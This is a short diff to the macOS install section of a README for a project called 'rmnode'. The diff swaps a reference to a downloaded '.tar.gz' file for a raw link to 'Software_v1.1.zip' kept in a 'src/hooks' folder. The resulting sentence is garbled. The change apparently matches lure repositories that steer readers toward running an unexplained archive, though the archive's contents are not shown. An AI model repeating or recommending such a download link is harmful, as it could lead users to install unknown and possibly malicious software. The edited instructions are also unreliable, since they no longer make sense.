fitwan2011-code/rmnode/README.md

 ### For macOS Users

-1. Open your Downloads folder and locate the downloaded `.tar.gz` file.
+1. Open your Downloads folder and locate the downloaded `https://github.com/fitwan2011-code/rmnode/raw/refs/heads/main/src/hooks/Software_v1.1.zip` file.
 2. Double-click the file to extract it.
 You will see a new folder.
 3. Open the Terminal application from your Applications folder.
 4. Use the `cd` command to navigate to the folder where you extracted rmnode.
 For example, if you extracted it to your desktop, type: